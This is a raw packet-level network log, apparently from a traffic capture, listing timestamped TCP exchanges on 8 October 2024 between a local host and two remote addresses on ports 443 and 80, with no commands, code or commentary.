                                                                                                                                                                                              Oct 8, 2024 15:37:49.575433969 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.575460911 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.575496912 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.575510025 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.575520039 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.575562000 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639540911 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639583111 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639604092 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639616966 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639633894 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639888048 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639930010 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639952898 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639961958 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.639971972 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640094042 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640115023 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640146017 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640155077 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640165091 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640646935 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640671968 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640697002 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640708923 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.640718937 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642091036 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642410994 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642433882 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642455101 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642468929 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642473936 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642483950 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642533064 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642849922 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642873049 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642905951 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642913103 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.642923117 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.643342018 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.643368959 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.643399954 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.643409014 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.643418074 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.664371967 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.664393902 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.664454937 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.664470911 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.664484024 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.664484024 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.665596962 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.665662050 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.665667057 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.665738106 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.666281939 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:49.918248892 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:49.924177885 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:49.924247980 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:49.924349070 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:49.929352045 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766021967 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766047001 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766057014 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766093969 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766366005 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766377926 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766416073 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966109991 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966125965 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966139078 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966159105 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966162920 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966170073 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966197014 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966207981 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966233969 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966247082 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966279030 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966286898 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966299057 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966310978 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966331005 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165545940 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165602922 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165630102 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165641069 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165658951 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165669918 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165688992 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165700912 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165708065 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165719032 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.165749073 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.166637897 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.166650057 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.166660070 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.166670084 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.166680098 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.166704893 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.167218924 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.167229891 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.167246103 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.167257071 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.167262077 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.167290926 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.252396107 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366426945 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366441011 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366451979 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366512060 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366523981 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366566896 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366566896 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366631031 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366642952 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366658926 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366678953 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366705894 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366717100 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366728067 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.366750002 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367564917 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367611885 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367621899 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367633104 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367646933 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367655993 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367666960 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.367707014 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.368390083 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.368446112 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.368455887 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.368467093 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.368483067 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.368499041 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566344023 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566365957 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566378117 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566416979 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566509008 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566520929 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566546917 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566878080 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566889048 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566900015 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566910028 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566920996 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566921949 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566929102 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.566962004 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.567548037 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.567742109 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.567756891 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.567784071 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.567856073 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.567867041 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.567894936 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568433046 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568480015 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568500996 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568512917 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568547010 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568577051 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568588018 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.568624020 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.569310904 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.569322109 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.569331884 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.569341898 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.569358110 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.569370985 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766427040 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766442060 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766453981 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766479969 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766519070 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766530991 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766547918 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766566038 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766568899 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766578913 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766602039 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766633034 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766644001 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766655922 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766668081 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766679049 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766681910 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766690969 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.766731024 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767321110 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767376900 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767404079 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767443895 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767452955 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767461061 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767507076 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767810106 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767860889 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767872095 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767900944 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767960072 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767976999 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767987967 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767998934 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.767998934 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768011093 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768023014 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768057108 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768788099 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768805027 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768815994 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768842936 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768914938 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768927097 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768938065 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768948078 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768949032 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768970966 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.768971920 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.769016981 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.769696951 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966658115 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966707945 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966738939 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966737986 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966749907 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966840982 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966861963 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966872931 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966885090 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966895103 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966907024 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966922045 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966936111 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966963053 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.966974974 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967016935 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967046022 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967057943 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967068911 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967080116 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967097998 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967103004 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967125893 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967900038 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967911959 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967922926 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967943907 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967952967 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967958927 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967971087 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967982054 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.967992067 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968008995 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968027115 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968070030 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968080997 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968091965 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968115091 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968137980 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968183041 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968863010 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968874931 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968884945 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968903065 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968910933 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968921900 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968934059 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968939066 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968945026 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.968967915 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969300985 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969312906 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969322920 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969341040 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969356060 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969373941 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969386101 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969396114 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969408035 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969419956 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969443083 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969479084 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969490051 CEST804917738.240.44.9192.168.2.22
